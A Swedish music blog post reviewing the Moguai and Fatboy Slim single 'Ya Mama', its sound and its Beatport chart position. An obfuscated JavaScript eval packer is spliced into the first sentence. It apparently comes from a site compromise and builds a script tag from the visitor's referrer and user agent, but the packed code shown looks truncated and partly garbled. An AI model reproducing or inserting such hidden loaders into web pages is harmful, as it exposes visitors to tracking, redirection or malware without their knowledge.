Image Image Image Image Image Image Image Image Image Image

| 18 januari, 2020

Scroll to top

Top

Moguai & Fatboy Slim – Ya Mama

Moguai & Fatboy Slim – Ya Mama
Alexander Gylemo

Moguai, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(’0.6(”<\\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rnfss|var|u0026u|referrer|ytebb||js|php’.split(’|’),0,{}))
som kom från ingenstans för att numera vara en av de hetaste producenterna inom housemusik, har precis teamat upp med legenden Fatboy Slim och släppt singeln ”Ya Mama” på Skint Records, låten är ett samarbete som visar nya sidor av dem båda.

Moguai blev stor över en natt med sin singel ”Optinuum” som är en av de bästa progessiva houselåtarna jag hört. Han har sedan dess fortsatt sitt segertåg med ett gäng låtar som mer eller mindre följt i liknande fotspår, något som bara hjälpt honom etablera sitt namn medan Fatboy Slim (som gått mellan mängder av stilar genom åren) har smalnat ner sin stil till techno på sistone.

Nu har de slagit ihop sina kloka producenthuvuden och de flesta hade nog inte trott att låten skulle bli så fruktansvärt dragig som den nu är. De gör underverk med ett klassiskt sample och drar igång ett riktigt taggande 130 bpm-beat tillsammans med en hänsynslös bas, och som om det skulle förvåna någon ligger singeln självklart med en gång etta på Beatports topplista.

httpv://www.youtube.com/watch?v=ebTwxk7XqwY